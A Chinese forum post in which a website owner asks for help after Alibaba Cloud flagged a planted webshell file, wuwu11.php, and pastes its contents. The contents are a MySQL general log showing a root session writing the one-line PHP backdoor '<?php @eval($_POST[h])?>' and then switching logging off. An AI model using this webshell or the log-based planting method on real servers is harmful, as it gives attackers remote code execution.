求助各位 v 友，网站根目录多了一个 wuwu11. PHP 的文件

阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件， 内容是：

D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: MySQL Time Id Command Argument 65264 Init DB mysql 65264 Query SHOW TABLES FROM `mysql` 65264 Query SHOW TABLE STATUS FROM `mysql` 65264 Query SELECT CURRENT_USER() 65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT' 65264 Query SELECT CURRENT_USER() 65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER' 65264 Quit 180330 19:55:36 65265 Connect root@localhost on 65265 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci' 65265 Init DB mysql 65265 Init DB mysql 65265 Query select '<?php @eval($_POST[h])?>' 65265 Init DB mysql 65265 Query SHOW TABLES FROM `mysql` 65265 Query SHOW TABLE STATUS FROM `mysql` 65265 Query SELECT CURRENT_USER() 65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT' 65265 Query SELECT CURRENT_USER() 65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER' 65265 Query SHOW TABLES 65265 Quit 180330 19:55:37 65266 Connect root@localhost on 65266 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci' 65266 Init DB mysql 65266 Init DB mysql 65266 Query set global general_log = 'Off'